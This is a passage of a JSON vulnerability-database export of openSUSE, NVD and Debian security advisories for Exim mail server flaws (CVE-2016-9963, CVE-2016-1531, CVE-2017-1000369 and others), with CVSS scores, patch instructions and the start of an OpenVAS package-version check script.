Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-753=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", 
"CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2020-8015"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0753-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UMX36VOLIS2TDKA3MXOUO365NDUK5WQ3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-06T14:11:40", "description": "Exim supports the use of multiple \"-p\" command line arguments which are malloc()'ed and never free()'ed, used in conjunction with other issues allows attackers to cause arbitrary code execution. This affects exim version 4.89 and earlier. 
Please note that at this time upstream has released a patch (commit 65e061b76867a9ea7aeeb535341b790b90ae6c21), but it is not known if a new point release is available that addresses this issue at this time.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T16:29:00", "type": "cve", "title": "CVE-2017-1000369", "cwe": ["CWE-404"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-12-12T13:35:00", "cpe": ["cpe:/a:exim:exim:4.89", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:exim:exim:4.87.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:exim:exim:4.88"], "id": "CVE-2017-1000369", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000369", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:exim:exim:4.89:rc6:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc4:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc7:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc6:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc3:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.87.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc2:*:*:*:*:*:*", 
"cpe:2.3:a:exim:exim:4.88:rc3:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc5:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc4:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc5:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc1:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:-:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:-:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.89:rc2:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.88:rc1:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:12", "description": "Exim before 4.87.1 might allow remote attackers to obtain the private DKIM signing key via vectors related to log files and bounce messages.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T15:59:00", "type": "cve", "title": "CVE-2016-9963", "cwe": ["CWE-320"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2017-02-15T12:47:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/a:exim:exim:4.87"], "id": "CVE-2016-9963", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9963", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:exim:exim:4.87:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-12-06T14:20:41", "description": "Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-1531", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:exim:exim:4.86"], "id": "CVE-2016-1531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:exim:exim:4.86:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-10-21T22:09:48", "description": 
"- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-25T10:08:23", "type": "debian", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], 
"modified": "2016-12-25T10:08:23", "id": "DEBIAN:DSA-3747-1:7D21A", "href": "https://lists.debian.org/debian-security-announce/2016/msg00331.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:33:22", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3747-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nDecember 25, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-9963\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-25T10:08:23", "type": "debian", "title": "[SECURITY] [DSA 3747-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-25T10:08:23", "id": "DEBIAN:DSA-3747-1:65DFE", "href": "https://lists.debian.org/debian-security-announce/2016/msg00331.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T19:04:32", "description": "Package : exim4\nVersion : 4.80-7+deb7u4\nCVE ID : CVE-2016-9963\n\n\nBjoern Jacke discovered that Exim, Debian's default mail transfer agent,\nmay leak the private DKIM signing key to the log files if specific\nconfiguration options are met.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-12-25T10:59:29", "type": "debian", "title": "[SECURITY] [DLA 762-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9963"], "modified": "2016-12-25T10:59:29", "id": "DEBIAN:DLA-762-1:0D8D2", "href": "https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-07T11:22:12", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3888-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 19, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2017-1000369\n\nThe Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling. 
For the\nfull details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-19T15:34:00", "type": "debian", "title": "[SECURITY] [DSA 3888-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-19T15:34:00", "id": "DEBIAN:DSA-3888-1:AEA40", "href": "https://lists.debian.org/debian-security-announce/2017/msg00147.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": 
"2023-12-07T17:14:58", "description": "Package : exim4\nVersion : 4.80-7+deb7u5\nCVE ID : CVE-2017-1000369\n\nExim supports the use of multiple \"-p\" command line arguments which are\nmalloc()'ed and never free()'ed, used in conjunction with other issues allows\nattackers to cause arbitrary code execution.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n4.80-7+deb7u5.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-06-25T01:33:19", "type": "debian", "title": "[SECURITY] [DLA 1001-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-25T01:33:19", "id": "DEBIAN:DLA-1001-1:275F5", "href": "https://lists.debian.org/debian-lts-announce/2017/06/msg00030.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-07T11:38:07", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-3517-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-1531\n\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using the\n'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": 
"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-03-14T05:48:18", "type": "debian", "title": "[SECURITY] [DSA 3517-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-14T05:48:18", "id": "DEBIAN:DSA-3517-1:82080", "href": "https://lists.debian.org/debian-security-announce/2016/msg00091.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T22:29:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3517-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2016-1531\n\nA local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using the\n'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl\nsupport).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. 
New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-14T05:48:18", "type": "debian", "title": "[SECURITY] [DSA 3517-1] exim4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-14T05:48:18", "id": "DEBIAN:DSA-3517-1:EFA69", "href": 
"https://lists.debian.org/debian-security-announce/2016/msg00091.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:55:12", "description": "Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.", "cvss3": {}, "published": "2016-12-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3747-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703747", "href": "http://plugins.openvas.org/nasl.php?oid=703747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3747.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3747-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703747);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-9963\");\n script_name(\"Debian Security Advisory DSA 3747-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-25 00:00:00 +0100 (Sun, 25 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"2.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3747.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic exim4\ninstallation.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 4.84.2-2+deb8u2.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"Bjoern Jacke discovered that Exim,\nDebian's default mail transfer agent, may leak the private DKIM signing key to\nthe log files if specific configuration options are met.\");\n 
